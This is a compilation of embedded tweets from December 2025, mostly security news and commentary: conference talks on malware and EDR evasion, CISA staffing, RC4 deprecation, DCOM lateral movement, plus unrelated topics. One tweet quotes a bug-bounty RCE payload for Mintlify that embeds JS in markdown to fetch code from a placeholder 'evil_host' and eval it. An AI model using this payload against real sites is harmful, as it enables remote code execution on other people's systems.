New BSides Canberra 2025 talk by “Alex” @mangopdf is now live:
“let’s make malware but it might get caught so the malware gets worse.”
Watch here: https://t.co/JYOk6qnP6f

— BSidesCanberra (@BSidesCbr) December 22, 2025

A complete disaster at the agency responsible for US cyber defence. "Nearly a third of its staff have left the agency since January, and some were recently given an ultimatum to either move into immigration-related roles at the Dept of Homeland Security...or leave the agency." https://t.co/Q7s2rQDuvj

— Shashank Joshi (@shashj) December 21, 2025

The Art of Pivoting - Techniques for Intelligence Analysts to Discover New Relationships in a Complex World https://t.co/KDssYRorpT

— Matthew Green 🌻 (@mgreen27) December 22, 2025

In 2011 Wikileaks released this. It's from the British Griffcomm that develops gov. spying gear since 1979. The BAM (Bodyworn Array Microphone) was a wearable array of 24 microphones that filtered out all noise apart from the target's voice. Designed for spying in noisy places. pic.twitter.com/KCivuBNmYp

— Spy Collection (@SpyCollection1) December 21, 2025

CVE-2007-0450 😭 Starbucks vulnerable to shit older than the people exploiting it at this point. https://t.co/YUTSCrwkw0

— Marco Bonelli (@mebeim) December 21, 2025

I am a Microsoft security architect.

In 1994, researchers discovered RC4 was fundamentally broken.

We made it the default cipher in Windows anyway.

By 2000, every machine on Earth was running it.

We called it "battle-tested."

Technically true. It lost every battle.

In 2013,… pic.twitter.com/9TvOHC0EAn

— Peter Girnus 🦅 (@gothburz) December 21, 2025

Microsoft Is Finally Killing RC4 https://t.co/j0WyoEY0aU

— Schneier Blog (@schneierblog) December 22, 2025

Erm, nope. Post-Venlo in Nov 1939 when the SD capture 2 SIS officers, the German underground/Nazi opposition are given a wide berth. The idea that SIS is somehow involved in the July plot is good fiction, poor history. https://t.co/mTJ9oxSEln

— Dr. Dan Lomas (@Sandbagger_01) December 21, 2025

The US government declassifying a PoC:#include<▇▇▇▇.h>
int ▇▇▇_▇▇▇▇ {
▇▇▇▇▇▇▇
▇▇▇▇▇▇
▇▇▇▇▇ ▇▇▇
return ▇▇;
}
/*
* ▇▇▇▇▇ ▇▇▇
* ▇▇▇▇▇▇▇ ▇
*/

— faulty *ptrrr (@0x_shaq) December 20, 2025

New BSides Canberra 2025 talk by Ayman Sagy is now live:
“Ding Dong The EDR is DEAD.”
Watch here: https://t.co/10c94Ss8yr

— BSidesCanberra (@BSidesCbr) December 22, 2025

if you didn't have enough of react2shell, here's a crazy RCE in a popular platform mintlify that's used for documentation

the wild part is the payload is just a JS expression within markdown

{!!fetch("evil_host").then((r) => r.text()).then((c) => eval(c))}#bugbounty pic.twitter.com/rdF8w7XLaD

— payloadartist (@payloadartist) December 20, 2025

All about a previously undescribed DCOM object that can be used for lateral movement: https://t.co/0Ad5RnXV0t pic.twitter.com/eO6ZaOCxz3

— Eugene Kaspersky (@e_kaspersky) December 19, 2025

Most people would say Windows, but, the one with less impact is macOS. Deleting Linux or Windows out of the sudden could be catastrophic, but we can survive without macOS.

So, obviously, I delete Windows. https://t.co/LCvLEoJdwh

— Zuhaitz (@zuhaitz_dev) December 20, 2025

[RELEASE] Part two is out! Callback chaining with tail calls and proxy frames to build semi-artificial call stacks and maybe annoy a few detection rules. Nothing ground breaking, but maybe somebody can pick up an idea or two.
Enjoy😉https://t.co/RFDBZfPJdl

— klez (@KlezVirus) December 22, 2025

the story behind what actually led to the alcohol ban in Saudi Arabia is wild https://t.co/VvLKLgGjYg pic.twitter.com/6lTAs0tIHg

— a rare photo of sean connery signed by roger moore (@steamedhamms) December 21, 2025

Logging Made Easy (LME) is a no cost, open source platform that centralizes log collection, enhances threat detection, and enables real-time alerting, helping small to medium-sized organizations secure their infrastructure https://t.co/j762xnq6c4

— Panos Gkatziroulis 🦄 (@ipurple) December 22, 2025

man.

with this epstein website @rtwlz has created something that’s half ingenious user interface to navigate an enormous data dump, and half perverse art project that is as creepy as it is novel

emails, photos, flights, amazon orders https://t.co/Jz9enRHGtq pic.twitter.com/1Q1eQvvX6f

— rat king 🐀 (@MikeIsaac) December 21, 2025

There she blows!! Wyrm, v0.7 is out, slowly inching towards an official stable v1.0 :) feedback as to features / improvements is welcome either via DM or GitHub issues!https://t.co/CMCr9DGecU

Change log:

- Updated docs at https://t.co/dxvePIBpkr
- Wyrm now builds as a… pic.twitter.com/M1b38n2fgq

— flux (@0xfluxsec) December 22, 2025

This week I had the pleasure of guest lecturing at both Georgetown University and Johns Hopkins SAIS on the intersection of AI, cyber and national security. You can find a brief overview of the topics I covered and my slides here.https://t.co/2bmRfKyFGc

— chrisrohlf (@chrisrohlf) October 25, 2025

As others have noted, during a disaster with a consequent power outage, Waymos would be blocking evacuation routes. Hard to believe no one asked these questions, until you realize that good governance is suspended when billionaires knock on the door. https://t.co/4YnwlOt2Ep

— Jaime Omar Yassin (@hyphy_republic) December 21, 2025